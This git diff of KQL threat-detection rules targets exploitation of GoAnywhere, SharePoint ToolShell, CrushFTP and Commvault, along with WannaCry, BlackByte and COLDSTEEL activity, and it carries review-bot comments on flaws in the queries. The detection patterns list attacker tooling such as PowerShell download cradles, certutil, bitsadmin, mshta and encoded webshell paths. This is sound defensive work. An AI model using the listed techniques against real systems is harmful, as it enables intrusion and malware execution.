+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
+// Date: 2023-01-21
+// Level: high
+// Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-k DHCPServer" and FolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "-k DHCPServer" and InitiatingProcessFolderPath endswith "\\svchost.exe" and (AccountName contains "NETWORK SERVICE" or AccountName contains "NETZWERKDIENST" or AccountName contains "SERVIZIO DI RETE" or AccountName contains "SERVICIO DE RED")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
index e15251a5..d330dbb9 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql
@@ -1,13 +1,13 @@
-// Title: Potential Exploitation of GoAnywhere MFT Vulnerability
-// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-07
-// Level: high
-// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.
-// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035
-// False Positives:
-// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.
-
-DeviceProcessEvents
+// Title: Potential Exploitation of GoAnywhere MFT Vulnerability
+// Author: MSFT (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-07
+// Level: high
+// Description: Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) application, which may indicate exploitation such as CVE-2025-10035.
+// This behavior is indicative of post-exploitation activity related to CVE-2025-10035, as observed in campaigns by the threat actor Storm-1175.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.execution, attack.t1059.001, attack.persistence, attack.t1133, detection.emerging-threats, cve.2025-10035
+// False Positives:
+// - Legitimate administrative scripts or built-in GoAnywhere functions could potentially trigger this rule. Tuning may be required based on normal activity in your environment.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath contains "\\GoAnywhere\\tomcat\\" and ((((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") or (ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session") or (ProcessCommandLine contains "whoami" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "FromBase64String(" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "curl")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "quser" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "curl") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
index 0beb7cdb..efdc47dd 100644
--- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql
@@ -1,11 +1,11 @@
-// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-07-21
-// Level: critical
-// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
-// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-21
+// Level: critical
+// Description: Detects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770.
+// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats
+
+DeviceFileEvents
 | where (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith "\\spinstall.aspx" or (FolderPath contains "\\spinstall" and FolderPath contains ".aspx") or FolderPath endswith "\\debug_dev.js") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
index 94159740..138d6269 100644
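Review bot: The `| where` clause filters on `FolderPath` only, so despite the "File Create" title this rule fires on every `DeviceFileEvents` action type (modify, rename, delete) that touches the listed paths, not just creation; adding `and ActionType == "FileCreated"` to the predicate, or a comment stating that all file actions are deliberately in scope, would align the query with its description. The branch `FolderPath endswith "\\spinstall.aspx"` is fully covered by the following `FolderPath contains "\\spinstall" and FolderPath contains ".aspx"` branch and can be dropped as dead weight. The description mentions `spinstall0.aspx` specifically; it would help the analyst if the comment also named `debug_dev.js`, which the query matches too.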
--- a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
+++ b/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql
@@ -1,11 +1,11 @@ -// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-07-21 -// Level: high -// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. -// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-07-21 +// Level: high +// Description: Detects potential exploitation of CVE-2025-53770 by identifying indicators such as suspicious command lines discovered in Post-Exploitation activities. +// CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution. 
+// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2025-53770, detection.emerging-threats + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\w3wp.exe" and ((ProcessCommandLine contains "cwBwAGkAbgBzAHQAYQBsAGwAMAAuAGEAcwBwAHgA" or ProcessCommandLine contains "MAcABpAG4AcwB0AGEAbABsADAALgBhAHMAcAB4A" or ProcessCommandLine contains "zAHAAaQBuAHMAdABhAGwAbAAwAC4AYQBzAHAAeA" or ProcessCommandLine contains "c3BpbnN0YWxsMC5hc3B4") or (ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAUgBPAEcAUgBBAH4AMQBcAEMATwBNAE0ATwBOAH4AMQBcAE0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAFIATwBHAFIAQQB+ADEAXABDAE8ATQBNAE8ATgB+ADEAXABNAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUABSAE8ARwBSAEEAfgAxAFwAQwBPAE0ATQBPAE4AfgAxAFwATQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains 
"oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw" or ProcessCommandLine contains "OgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABDAG8AbQBtAG8AbgAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwBoAGEAcgBlAGQAXABXAGUAYgAgAFMAZQByAHYAZQByACAARQB4AHQAZQBuAHMAaQBvAG4AcwBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMA" or ProcessCommandLine contains "oAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwAQwBvAG0AbQBvAG4AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdAAgAFMAaABhAHIAZQBkAFwAVwBlAGIAIABTAGUAcgB2AGUAcgAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTA" or ProcessCommandLine contains "6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEMAbwBtAG0AbwBuACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAIABTAGgAYQByAGUAZABcAFcAZQBiACAAUwBlAHIAdgBlAHIAIABFAHgAdABlAG4AcwBpAG8AbgBzAFwAMQA2AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUw"))) or (ProcessCommandLine contains "-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0" or ProcessCommandLine contains "TEMPLATE\\LAYOUTS\\spinstall0.aspx") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql index b291ca19..803f6d95 100644 --- a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql +++ b/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql 
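Review bot: Every base64 indicator in this `| where` clause is matched with `contains`, which in KQL is case-insensitive, but base64 is case-sensitive, so the rule also accepts case variants that would decode to different bytes; `contains_cs` is the precise operator for these fragments and is also cheaper to evaluate. The same applies to the `-EncodedCommand JABiAGEAcwBlADYANABTAHQAcgBpAG4AZwAgAD0` branch at the end of the clause. A short comment above the query noting that the fragments are UTF-16LE/base64 encodings of the `spinstall0.aspx` name and LAYOUTS paths in their three alignment offsets would save the next maintainer from decoding them by hand; the description line currently only says "suspicious command lines".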
@@ -1,15 +1,15 @@ -// Title: Suspicious CrushFTP Child Process -// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-10 -// Level: medium -// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as -// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. -// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats -// False Positives: -// - Legitimate CrushFTP administrative actions -// - Software updates - -DeviceProcessEvents +// Title: Suspicious CrushFTP Child Process +// Author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-10 +// Level: medium +// Description: Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as +// CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests. +// The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands. 
+// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1190, cve.2025-31161, detection.emerging-threats +// False Positives: +// - Legitimate CrushFTP administrative actions +// - Software updates + +DeviceProcessEvents | where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\crushftpservice.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql index fed91862..beaad77c 100644 --- a/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql 
@@ -1,10 +1,10 @@ -// Title: WannaCry Ransomware Activity -// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro -// Date: 2019-01-16 -// Level: critical -// Description: Detects WannaCry ransomware activity -// MITRE Tactic: Lateral Movement -// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats - -DeviceProcessEvents +// Title: WannaCry Ransomware Activity +// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +// Date: 2019-01-16 +// Level: critical +// Description: Detects WannaCry ransomware activity +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "@Please_Read_Me@.txt" or ((FolderPath endswith "\\tasksche.exe" or FolderPath endswith "\\mssecsvc.exe" or FolderPath endswith "\\taskdl.exe" or FolderPath endswith "\\taskhsvc.exe" or FolderPath endswith "\\taskse.exe" or FolderPath endswith "\\111.exe" or FolderPath endswith "\\lhdfrgui.exe" or FolderPath endswith "\\linuxnew.exe" or FolderPath endswith "\\wannacry.exe") or FolderPath contains "WanaDecryptor") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql index 69cf42b9..1e9363ef 100644 --- a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql 
@@ -1,12 +1,12 @@
-// Title: Blackbyte Ransomware Registry
-// Author: frack113
-// Date: 2022-01-24
-// Level: high
-// Description: Detects specific windows registry modifications made by BlackByte ransomware variants.
-// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
-// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Blackbyte Ransomware Registry
+// Author: frack113
+// Date: 2022-01-24
+// Level: high
+// Description: Detects specific windows registry modifications made by BlackByte ransomware variants.
+// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
+// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql
index b5e28149..b8923aab 100644
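Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` is the Sysmon `Details` rendering carried over from the Sigma source; in `DeviceRegistryEvents` the type lives in `RegistryValueType` and `RegistryValueData` holds the value as a plain string, so this equality is unlikely ever to be true against MDE data and the rule is effectively dead — `RegistryValueType == "Dword" and RegistryValueData == "1"` is the equivalent predicate (confirm against live telemetry). The third key path contains `CurrentControlSet001`, which is neither the `CurrentControlSet` alias nor a numbered `ControlSet00N` name, so that `in~` member cannot match regardless of how the value is rendered. The same Sysmon-format carry-over appears in the Kapeka hunk, where `not(RegistryValueData contains "(Empty)")` should be `isnotempty(RegistryValueData)`.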
--- a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql +++ b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql @@ -1,10 +1,10 @@ -// Title: Blue Mockingbird -// Author: Trent Liffick (@tliffick) -// Date: 2020-05-14 -// Level: high -// Description: Attempts to detect system changes made by Blue Mockingbird -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats - -DeviceProcessEvents +// Title: Blue Mockingbird +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains "sc config" and ProcessCommandLine contains "wercplsupporte.dll") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine endswith "COR_PROFILER" and FolderPath endswith "\\wmic.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql index 92ec323a..fa35da9f 100644 --- a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql 
@@ -1,10 +1,10 @@ -// Title: COLDSTEEL RAT Anonymous User Process Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-30 -// Level: high -// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats - -DeviceProcessEvents +// Title: COLDSTEEL RAT Anonymous User Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceProcessEvents | where (InitiatingProcessFolderPath contains "\\Windows\\System32\\" or InitiatingProcessFolderPath contains "\\AppData\\") and AccountName contains "ANONYMOUS" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql index 97427716..d8fadd66 100644 --- a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql 
@@ -1,12 +1,12 @@ -// Title: COLDSTEEL RAT Cleanup Command Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-30 -// Level: critical -// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: COLDSTEEL RAT Cleanup Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: critical +// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "UpdateDriverForPlugAndPlayDevicesW" or ProcessCommandLine contains "ServiceMain" or ProcessCommandLine contains "DiUninstallDevice") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessCommandLine contains " -k msupdate" or InitiatingProcessCommandLine contains " -k msupdate2" or InitiatingProcessCommandLine contains " -k alg") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql index f4bd0418..eb01a484 100644 --- a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql 
+++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql @@ -1,12 +1,12 @@ -// Title: COLDSTEEL RAT Service Persistence Execution -// Author: X__Junior (Nextron Systems) -// Date: 2023-04-30 -// Level: critical -// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: COLDSTEEL RAT Service Persistence Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-30 +// Level: critical +// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine endswith " -k msupdate" or ProcessCommandLine endswith " -k msupdate2" or ProcessCommandLine endswith " -k alg") and FolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql index ef2106e1..de3a5dc5 100644 --- a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql +++ b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql 
@@ -1,11 +1,11 @@ -// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-20 -// Level: high -// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop. -// This is a post-authentication step corresponding to CVE-2025-57790. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790 - -DeviceProcessEvents +// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: high +// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop. +// This is a post-authentication step corresponding to CVE-2025-57790. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790 + +DeviceProcessEvents | where ProcessCommandLine contains "qoperation" and ProcessCommandLine contains "exec" and ProcessCommandLine contains " -af " and ProcessCommandLine contains ".xml " and ProcessCommandLine contains "\\Apache\\webapps\\ROOT\\" and ProcessCommandLine contains ".jsp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql index 71d7f04e..24dc5f58 100644 --- a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql 
@@ -1,13 +1,13 @@ -// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry -// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO -// Date: 2020-05-13 -// Level: high -// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. -// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats -// False Positives: -// - New printer port install on host - -DeviceRegistryEvents +// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry +// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO +// Date: 2020-05-13 +// Level: high +// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. +// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceRegistryEvents | where (RegistryValueData contains ".bat" or RegistryValueData contains ".com" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".ps1" or RegistryValueData contains ".vbe" or 